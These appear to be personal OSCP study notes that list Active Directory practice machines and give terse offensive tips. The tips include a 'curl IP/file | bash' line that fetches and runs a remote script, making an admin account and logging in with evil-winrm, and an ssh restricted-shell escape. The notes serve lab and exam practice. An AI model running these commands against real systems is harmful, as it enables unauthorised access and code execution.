Notes
God notes
PG boxes on OSCP:
https://defaultcredentials.com/oscp/best-active-directory-practice-for-oscp/
Heist, Hutch, Vault in PG Practice,Resourced
HTB:
APT, Fuse, Cascade, Monterverde,Resolute,Forest, Arkham, Active, Mantis
Cyber Seclabs:
zero, Secret,Brute, Dictionary, Roast, Spray, Sync, Toast
Always look for config files if you have access to application files!
adds an admini account to the hosts
Try legion script for nmap scanning!
always do nmap -sC (default scripts)
If you are a service account you can create an admin account.
evil-winrm -i IP -u gori -p 'passwd123!' to login as the account you just created
net user gori to check priv
---
/etc/apache2 ;look for config files
linux enum
ldd --version
Transfer module
curl IP/file_name | bash (to execute it)
cat /etc/lsb-release
Transfer method
python -m SimpleHTTPserver 80
-> curl -o outputfile IP/filename
Restricted shell? Try this:
ssh mindy@10.129.29.189 -t "bash --noprofile"
---
Run sudo
Last updated